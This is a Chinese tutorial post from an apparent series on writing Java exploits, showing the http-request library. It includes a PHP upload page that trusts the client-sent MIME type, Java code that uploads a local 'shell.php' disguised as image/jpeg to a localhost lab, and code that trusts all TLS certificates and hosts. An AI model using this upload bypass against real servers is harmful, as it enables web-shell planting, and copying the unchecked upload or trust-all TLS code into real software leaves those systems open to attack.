JAVA-Exploit编写(6)--http-request库文件上传使用

内心如初2025-01-19 8:47

目录

1.http-request简介

[2. 依赖导入](#2. 依赖导入)

3.文件上传页面代码

[4. http-request文件上传简单使用](#4. http-request文件上传简单使用)

5.请求https的网站解决SSL证书的问题

[5. 1 直接请求带https域名的网站](#5. 1 直接请求带https域名的网站)

[5.2 信任所有证书](#5.2 信任所有证书)

1.http-request简介

http-request 是一个库 里面提供很多方法,使得很容易就可以构造http请求,相比于之前使用的标准库类等要简单使用很多,目前通过此库来编写EXP较多.

2. 依赖导入

bash 复制代码 
<dependency>
      <groupId>com.github.kevinsawicki</groupId>
      <artifactId>http-request</artifactId>
      <version>5.6</version>
</dependency>

3.文件上传页面代码

php 复制代码 
<?php
if (($_FILES["file"]["type"] == "image/gif" || $_FILES["file"]["type"] == "image/jpeg" || $_FILES["file"]["type"] == "image/png") && $_FILES["file"]["size"] < 20000) {
    if ($_FILES["file"]["error"] > 0) {
        echo "Return Code: " . $_FILES["file"]["error"] . "<br />";
        echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
        echo "Temp file: " . $_FILES["file"]["tmp_name"] . "<br />";
    } else {
        if (file_exists("uploads/" . $_FILES["file"]["name"])) {
            echo $_FILES["file"]["name"] . " already exists. ";
        } else {
            move_uploaded_file($_FILES["file"]["tmp_name"], "uploads/" . $_FILES["file"]["name"]);
            echo "Stored in: " . "uploads/" . $_FILES["file"]["name"];
        }
    }
} else {
    echo "Invalid file";
}
?>

4. http-request文件上传简单使用

相比于之前使用的标准库和httpcomponents库来说,使用起来简单很多,通过设置文件头和.part方法即可,一看就懂.

java 复制代码 
package com.deger.HttpRequest;

import com.github.kevinsawicki.http.HttpRequest;

import java.io.File;

public class HttpRequestUpload {
    public static void main(String[] args) {
        // 文件上传
        HttpRequest httpRequest = HttpRequest.post("http://127.0.0.1/upload.php");
        // 设置请求头的文件类型
        httpRequest.header( "content-Type","multipart/form-data;boundary=AaB03x");
        // 设置上传的文件 以及上传文件位置
        httpRequest.part("file","test123.php","image/jpeg",new File("D:\\phpstudy_pro\\WWW\\shell.php"));
        // 接收响应信息
        System.out.println(httpRequest.body());

    }
}

5.请求https的网站解决SSL证书的问题

5. 1 直接请求带https域名的网站

java 复制代码 
package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxxx.com");
        System.out.println(httpRequest.body());
    }
}

5.2 信任所有证书

只需要使用两个方法就可以正常使用了

java 复制代码 
package com.deger.HttpRequest;


import com.github.kevinsawicki.http.HttpRequest;

public class HttpRequestSsl {
    public static void main(String[] args) {
        HttpRequest httpRequest = HttpRequest.get("https://www.xxxxx.com");
        //信息所有证书和主机
        httpRequest.trustAllCerts();
        httpRequest.trustAllHosts();
        System.out.println(httpRequest.body());
    }
}
相关推荐
Brucye2 小时前
信息收集-源码获取
网络安全
回到原点的码农2 小时前
Spring Data JDBC 详解
java·数据库·spring
gf13211112 小时前
python_查询并删除飞书多维表格中的记录
java·python·飞书
zb200641202 小时前
Spring Boot 实战:轻松实现文件上传与下载功能
java·数据库·spring boot
一勺菠萝丶3 小时前
Flowable + Spring 集成踩坑:流程结束监听器查询历史任务为空 & 获取不到审批意见
java·数据库·spring
jwn9993 小时前
Spring Boot 整合 Keycloak
java·spring boot·后端
宁波阿成3 小时前
OpenClaw 在 Ubuntu 22.04.5 LTS 上的安装与问题处理记录
java·linux·ubuntu·openclaw·龙虾
mldlds3 小时前
SpringBoot详解
java·spring boot·后端
kang_jin3 小时前
Spring Boot 自动配置
java·spring boot·后端
sg_knight3 小时前
如何用 Claude Code 做大型项目重构与架构优化
java·重构·架构·llm·claude·code·claude-code
热门推荐
01GitHub 镜像站点02Qwen3.5 开源全解析:从 0.8B 到 397B,代际升级 + 全场景选型指南03OpenClaw 使用和管理 MCP 完全指南04UV安装并设置国内源05OpenClaw Control UI安全上下文访问配置06小黑课堂计算机二级WPSoffice题库软件下载安装教程(2026年3月最新版)07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08OpenClaw macOS 完整安装与本地模型配置教程(实战版)09本地部署 OpenClaw + DeepSeek-R1 完全指南10AI 编程三剑客:Spec-Kit、OpenSpec、Superpowers 深度对比与实战指南